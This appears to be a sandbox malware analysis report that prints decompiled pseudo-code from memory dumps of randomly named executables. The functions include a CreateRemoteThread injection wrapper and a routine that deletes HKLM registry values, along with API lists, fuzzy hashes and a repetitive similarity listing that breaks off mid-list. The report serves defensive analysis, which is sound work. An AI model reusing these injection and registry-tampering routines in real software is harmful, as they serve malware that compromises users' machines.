				 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
				_t114 =  *((intOrPtr*)(_t115 + 8));
				_t112 =  *((intOrPtr*)(_t114 + 0x1b48)) + 0x1bc8;
				 *(_t115 - 0x24) =  *(_t114 + 0x1b14);
				if(( *(_t114 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t112 + 0x1b40), 0xffffffff);
				}
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				while(( *(_t112 + 0x1b44) & 0x00000001) != 0 && ( *(_t114 + 0x1b44) & 0x00000001) != 0) {
					 *(_t115 - 0x20) =  *(_t115 - 0x20) + 1;
					_t70 =  *(_t115 - 0x20);
					if(_t70 == 0) {
						 *(_t115 - 0x30) = 0xd80;
						continue;
					}
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						__eflags =  *(_t115 - 0x30) - 0xd80;
						if( *(_t115 - 0x30) > 0xd80) {
							 *(_t115 - 0x30) = 0xd80;
						}
						_t72 =  *((intOrPtr*)(_t114 + 0x1b48));
						__eflags =  *((intOrPtr*)(_t72 + 0x6c)) - 3;
						if(__eflags != 0) {
							ResetEvent( *(_t114 + 0x1b40));
							_t77 = ReadFile( *(_t115 - 0x24), _t114 + 0xd8c,  *(_t115 - 0x30), _t115 - 0x1c, _t114 + 0x1b30);
							__eflags = _t77;
							if(_t77 == 0) {
								_push( *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c));
								_push(0xa);
								E001D3644( *(_t115 - 0x24), _t115 - 0x1c, _t114 + 0x1b30);
							}
						} else {
							_push(_t115 - 0x1c);
							_push( *(_t115 - 0x30));
							_t107 = _t114 + 0xd8c;
							_push(_t114 + 0xd8c);
							_push(_t72);
							E001D1F4E(0xd80, _t112, _t114, __eflags);
						}
						__eflags =  *(_t115 - 0x1c);
						if(__eflags == 0) {
							__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c);
							if(__eflags != 0) {
								E001D1672( *(_t115 - 0x24));
							}
						}
						continue;
					}
					_t85 = _t71 - 1;
					if(_t85 == 0) {
						_t87 = 0xd80 -  *((intOrPtr*)(_t114 + 8));
						 *((intOrPtr*)(_t115 - 0x28)) = _t87;
						__eflags =  *(_t115 - 0x1c) - _t87;
						if( *(_t115 - 0x1c) > _t87) {
							_t107 =  *(_t115 - 0x1c) - _t87;
							__eflags =  *(_t115 - 0x1c) - _t87;
							E001D176E(_t112,  *(_t115 - 0x1c) - _t87, _t114, 0,  *(_t115 - 0x1c) - _t87);
						}
						_t89 = E001D20DA(0xd80, _t107, _t114, _t114 + 0xd8c,  *(_t115 - 0x1c));
						__eflags = _t89;
						if(_t89 == 0) {
							E001D1672( *(_t115 - 0x24));
						}
						__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c) - 3;
						if(__eflags != 0) {
							L22:
							 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
						}
						continue;
					}
					_t93 = _t85 - 1;
					if(_t93 == 0) {
						WaitForSingleObject( *(_t112 + 0x1b10), 0xffffffff);
						continue;
					}
					_t95 = _t93 - 1;
					if(_t95 == 0) {
						_t97 = E001D176E(_t112, __eflags, _t112, _t112 + 0xd8c, 0xd80);
						 *(_t115 - 0x1c) = _t97;
						__eflags = _t97;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t126 = _t95 != 1;
					if(_t95 != 1) {
						continue;
					}
					E001D2F13(_t112, 2);
					_push( *(_t115 - 0x1c));
					_push(_t112 + 0xd8c);
					_push( *((intOrPtr*)(_t112 + 0x1b48)));
					if(E001D2046(0xd80, _t114, _t126) == 0) {
						E001D1672( *(_t115 - 0x24));
					}
					E001D2F13(_t112, 1);
					goto L22;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				__eflags = 0;
				return E001D173E(0);
			}

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D1809

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

Part of subcall function 001D2046: wsprintfA.USER32 ref: 001D2081

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D18AA

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

ResetEvent.KERNEL32(?), ref: 001D1935
ReadFile.KERNEL32(?,?,?,?,?), ref: 001D1953

Part of subcall function 001D3644: GetLastError.KERNEL32(?,?,001D197B,?,?,?,0000000A,00000003), ref: 001D3646
Part of subcall function 001D3644: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D3660
Part of subcall function 001D3644: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001D3671

Part of subcall function 001D1672: RaiseException.KERNEL32(00000003,00000000,00000001,?,001D1AB9,?,001D1A90,?,?,001D2102,?), ref: 001D167D

Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,?), ref: 001D2009

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Similarity

Total matches: 6
API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject
String ID:
API String ID: 2693620855-0
Opcode ID: 6e6f1deaef2e8bfaf0bbf284ef32ef05483bd122caecc3e4ef501d8e832f1d31
Instruction ID: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
Opcode Fuzzy Hash: BBF0A947480D4AF7D81B5931141CBBB7448B7CA3C18DCA65C30416752EAEDF325E9A5F
Instruction Fuzzy Hash: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68

C-Code - Quality: 97%

			E001D1466(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t11;
				void* _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t25;
				void* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t39;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;

				_t45 =  *0x1d5000; // 0x0
				if(_t45 == 0) {
					L5:
					__eflags =  *0x1d5078; // 0x0
					if(__eflags != 0) {
						L11:
						_t12 = 0;
						L14:
						L15:
						return _t12;
					}
					E001D37B7(_t11, 0x1d508c,  *0x1d5074);
					__eflags =  *0x1d50c4; // 0x1
					if(__eflags == 0) {
						_t20 = E001D37D0(0x28, 0,  &_v8);
						_t33 =  *0x1d5074; // 0x0
						asm("sbb ecx, ecx");
						__eflags =  ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2;
						if( ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2 != 0) {
							 *0x1d50bc = 0;
						}
					}
					__eflags =  *0x1d50bc; // 0x0
					if(__eflags != 0) {
						L13:
						 *0x1d5080 = 0x1d508c;
						_t12 = CreateThread(0, 0, E001D36F3, 0, 0, 0x1d5088);
						 *0x1d5000 = _t12;
						goto L14;
					} else {
						 *0x1d5084 =  *0x1d5084 + 1;
						_t14 =  *0x1d5084; // 0x0
						__eflags = _t14 - _a4;
						if(_t14 < _a4) {
							_t16 = E001D37D0(0x28, 0,  &_v8);
							_t32 =  *0x1d5074; // 0x0
							 *_t32 =  *((intOrPtr*)(_t16 + 2));
							E001D37B7( *((intOrPtr*)(_t16 + 2)), 0x1d508c,  *0x1d5074);
							 *0x1d50c4 = 1;
							 *0x1d50bc = 1;
							goto L13;
						}
						goto L11;
					}
				}
				PostThreadMessageA( *0x1d5088, 0x12, 0, 0);
				WaitForSingleObject( *0x1d5000, 0x7530);
				CloseHandle( *0x1d5000);
				 *0x1d5000 = 0;
				_t25 = E001D37D0(0x1e, 0,  &_v8);
				_t46 =  *0x1d5049; // 0x0
				_t11 =  *_t25;
				if(_t46 != 0) {
					L3:
					if((_t11 & 0x00000004) == 0) {
						goto L5;
					}
					_t27 = E001D37D0(0x28, 0,  &_v8);
					_t39 =  *0x1d5074; // 0x0
					 *((char*)(_t27 + 2)) =  *_t39 - 1;
					_t12 = 0;
					goto L15;
				}
				_t47 =  *0x1d50bc; // 0x0
				if(_t47 == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
CloseHandle.KERNEL32 ref: 001D149C
CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Similarity

Total matches: 6
API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: dbc64af6430ca1c5886ade0b967d05941ebfb9057e984414971c4070ddfe475d
Instruction ID: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
Opcode Fuzzy Hash: FCF05C45404DB79BC52710821517B2E20D2AF46B8EC4233726635F6ECC0DD17008BF0D
Instruction Fuzzy Hash: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3

C-Code - Quality: 59%

			E001D1F4E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t57;
				signed int _t61;
				intOrPtr _t63;
				void* _t64;

				_push(0x44);
				_push(0x1d1390);
				E001D1637(__ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t64 + 8));
				_t61 = 0;
				_t57 = 0;
				 *(_t64 - 4) = 0;
				while(1) {
					_push(0);
					_push(0);
					_push(_t64 - 0x20);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t64 - 0x20)) == 0) {
						break;
					}
					_t52 =  *((intOrPtr*)(_t64 + 0x10)) - _t61;
					 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					if(_t52 >  *((intOrPtr*)(_t64 - 0x20))) {
						_t52 =  *((intOrPtr*)(_t64 - 0x20));
						 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					}
					_push(_t64 - 0x1c);
					_push(_t52);
					_push( *((intOrPtr*)(_t64 + 0xc)) + _t61);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t64 - 0x1c)) != 0) {
						_t61 = _t61 +  *((intOrPtr*)(_t64 - 0x1c));
						 *(_t64 - 0x28) = _t61;
						continue;
					}
					break;
				}
				 *( *(_t64 + 0x14)) = _t61;
				if(_t61 != 0) {
					lstrcpyA(_t64 - 0x54, "TagId");
					 *((intOrPtr*)(_t64 - 0x1c)) = 0x28;
					_push(0);
					_push(_t64 - 0x1c);
					_push(_t64 - 0x54);
					_push(0xffff);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c88))() != 0) {
						lstrcpyA(_t63 + 0x3cb0, _t64 - 0x54);
					}
					_t57 = E001D1603( *((intOrPtr*)(_t64 + 0xc)), _t61);
					 *(_t64 - 0x2c) = _t57;
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				if(_t57 == 0) {
					 *(_t63 + 0x5c) =  *(_t63 + 0x5c) & 0x000000fb;
					 *( *(_t64 + 0x14)) =  *( *(_t64 + 0x14)) & _t57;
				}
				return E001D173E(_t57);
			}

APIs

lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
lstrcpyA.KERNEL32(?,?), ref: 001D2009

Strings

(, xrefs: 001D1FD8
TagId, xrefs: 001D1FC7

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID:
API String ID: 3598368018-0
Opcode ID: 02c1a043345bfcf4915c21911e954b3d5073dba7e642fc22e378a39fa225183a
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: 3BD0A900CE2DC9B876631047996CB73E2009F121CA98C378A32D90CB088B2E3038E341
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E001D3020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Similarity

Total matches: 6
API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx
String ID:
API String ID: 2802766549-0
Opcode ID: e8b56a8720ee6e3ece2d4dc4a7345ea2c28f84232851412fee7266dde94396d7
Instruction ID: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
Opcode Fuzzy Hash: 15D0A982DC09873A2B430048AA3D7E8E072FA502C08ACA3F234800AE568F4F3008CF52
Instruction Fuzzy Hash: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d

C-Code - Quality: 100%

			E001D35DB() {
				void* _v8;
				int _v12;
				char _v44;
				long _t10;
				int _t18;

				_t10 = RegOpenKeyExA(0x80000002,  *0x1d5004, 0, 0xf003f,  &_v8);
				if(_t10 == 0) {
					_t18 = 0x20;
					while(1) {
						_v12 = _t18;
						if(RegEnumValueA(_v8, 0,  &_v44,  &_v12, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v8,  &_v44);
					}
					return RegCloseKey(_v8);
				}
				return _t10;
			}

0x001d35f9
0x001d3601
0x001d360d
0x001d361d
0x001d362d
0x001d3634
0x00000000
0x00000000
0x001d3617
0x001d3617
0x00000000
0x001d3640
0x001d3643

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject
String ID:
API String ID: 1487171737-0
Opcode ID: 113accf1a247a85ca4628c88750f0cdfece1ea245e894959ebf4d1c2d30c192f
Instruction ID: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
Opcode Fuzzy Hash: 3ED0228D802F0BD0CC5B5047AF2E3320106AB40BDAE1C89703290414816F1FE067EF8D
Instruction Fuzzy Hash: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf

C-Code - Quality: 100%

			E001D1ABC(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a8 != 0) {
						E001D1E27(_t14, 0x7fffffff);
					}
					E001D1DD4(_t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x001d1abd
0x001d1ac3
0x001d1aca
0x001d1ad2
0x001d1ad2
0x001d1ad8
0x001d1add
0x001d1ae5
0x001d1af8
0x001d1b02
0x001d1b02
0x001d1b0e
0x001d1b0e
0x00000000
0x001d1b15
0x001d1b1c

APIs

WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
CloseHandle.KERNEL32(?), ref: 001D1B0E
LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D1E27: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D1E4D
Part of subcall function 001D1E27: TranslateMessage.USER32(?), ref: 001D1E74
Part of subcall function 001D1E27: DispatchMessageA.USER32(?), ref: 001D1E7E

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Loading ...

Warning!

Similarity Report

Overview

General Information

Static File Info

Similarity Information

Similar Processes

Similar Functions

Process Name: rEF274uSok.exe Analysis ID: 57816

General

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6synchronizationthread

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6synchronizationregistrythread

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6thread

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6registrystring

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6threadinjection

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5threadwindownetwork

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6synchronization

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6windowregistrytime

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6memorythreadinjection

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3threadinjection

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6thread

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6threadsynchronizationinjection

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6synchronizationfile

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6threadsynchronizationwindow

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6string

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3threadinjection

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6registry

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6synchronizationthread

Process Name: dRoYbhso1n.exe Analysis ID: 57815

General

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6synchronizationthread

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6synchronizationregistrythread

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6thread

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6registrystring

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6threadinjection

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5threadwindownetwork

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6synchronization

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6windowregistrytime

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6memorythreadinjection

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3threadinjection

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6thread

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6threadsynchronizationinjection

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6synchronizationfile

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6threadsynchronizationwindow

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6string

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3threadinjection

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6registry

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6synchronizationthread

Process Name: x2f5mqUHUN.exe Analysis ID: 57817

General

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6synchronizationthread

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6synchronizationregistrythread

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
synchronization

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
